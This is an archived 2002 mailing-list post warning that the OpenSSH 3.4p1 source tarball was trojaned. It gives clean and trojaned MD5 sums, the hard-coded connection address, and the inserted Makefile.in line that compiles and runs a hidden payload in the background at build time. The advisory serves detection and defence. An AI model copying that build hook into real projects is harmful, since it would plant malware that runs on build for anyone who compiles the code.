Firewall Wizards mailing list archives
Re: OpenSSH 3.4p1 possibly trojaned
From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 08:33:09 -0400 (EDT)
On Thu, 1 Aug 2002, Paul D. Robertson wrote:
It would appear that the OpenSSH code for all the non-OpenBSD systems was trojaned at some point pretty recently. I just checked the MD5 (and sources) of the version I put on my public-facing systems, and it's the same as the FreeBSD ports one (clean): # md5sum openssh-3.4p1.tar.gz 459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz I got that copy around 19:43 Eastern on July 17th. If you pulled a copy after that, it's probably worth a check. ------------------------------------------------------------------------ Things to check: MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57 Source addition: openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
It looks to me as if it might try to clean this up after the source is built, but I don't have a test enviornment I'm willing to sacrafice at the moment. If you don't have the tar.gz file to check the MD5 sum of and you built from source, I'd recommend getting a new copy once the trojan has been replaced, or grabbing a copy from somewhere like the FreeBSD ports collection.,
Trojan connection: 203.62.158.32:6667 (web.snsonline.net)
This address and port look to be hard coded in the trojan. It's probably worth an outbound access list if you're worried- although the server seems to be down at the moment. Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts () patriot net which may have no basis whatsoever in fact." probertson () trusecure com Director of Risk Assessment TruSecure Corporation _______________________________________________ firewall-wizards mailing list firewall-wizards () honor icsalabs com http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
Current thread:
- OpenSSH 3.4p1 possibly trojaned Paul D. Robertson (Aug 01)
- Re: OpenSSH 3.4p1 possibly trojaned Paul D. Robertson (Aug 01)
- Re: OpenSSH 3.4p1 possibly trojaned hennings (Aug 01)